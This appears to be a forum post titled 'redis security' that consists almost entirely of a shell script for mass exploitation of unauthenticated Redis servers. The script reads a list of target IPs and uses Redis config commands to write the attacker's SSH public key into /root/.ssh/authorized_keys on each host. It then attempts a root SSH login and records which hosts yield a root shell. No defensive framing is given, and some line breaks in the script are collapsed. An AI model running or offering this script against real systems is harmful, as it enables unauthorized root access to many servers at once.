redis安全
#!/bin/shif [ $# -eq 1]
then ip_list=$1
##create id_rsa
echo "****************************************Create id_rsa file"
expect -c "
spawn ssh-keygen -t rsa -f id_rsa -C \"yyf\"
expect { \"*passphrase): \" {
exp_send \"\r\"
exp_continue
} \"*again: \" {
exp_send \"\r\"
} \"*y/n)? \" {
exp_send \"n\r\"
}
}
expect eof
"
echo "\n\n****************************************Attack Targets"
touch noauth.txt runasroot.txt rootshell.txt haveauth.txt i=0
cat $ip_list | while read ip do i=`expr $i + 1`; #write id_rsa.pub to remote
echo "*****${i}***connect to remote ${ip} redis "
expect -c "
set timeout 3
spawn redis-cli -h $ip config set dir /root/.ssh/
expect { \"OK\" { exit 0 } \"ERR Changing directory: Permission denied\" { exit 1 }
timeout { exit 2 } \"(error) NOAUTH Authentication required\" { exit 3 }
}
"
case $? in 0)echo "run redis as root"
echo $ip >> noauth.txt echo $ip >> runasroot.txt
;;
1)echo "not run redis as root\n\n\n"
echo $ip >> noauth.txt continue
;;
2)echo "connect timeout\n\n\n"
continue
;;
3)echo "Have Auth\n\n\n"
echo $ip >> haveauth.txt continue
;; esac
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h $ip -x set 1
redis-cli -h $ip config set dir /root/.ssh/
redis-cli -h $ip config set dbfilename "authorized_keys"
redis-cli save #login test
echo "#try to login"
expect -c "
set timeout 5
spawn ssh -i id_rsa root@$ip echo \"yyf\"
expect { \"*yes/no\" { send \"yes\n\"} \"*password\" { send \"\003\"; exit 1 } \"yyf\" { exit 0 }
timeout { exit 2 }
}
exit 4
"
exitcode=$?
if [ $exitcode -eq 0 ]
then echo "---------------${ip} is get root shell"
echo $ip >> rootshell.txt fi echo "\n\n\n"
done echo "##########Final Count##########"
wc -l $ip_list
echo "----------"
wc -l noauth.txt
wc -l runasroot.txt
wc -l rootshell.txt echo "----------"
wc -l haveauth.txt else echo "usage: ./redis.sh ip.txt"
fi
页:
[1]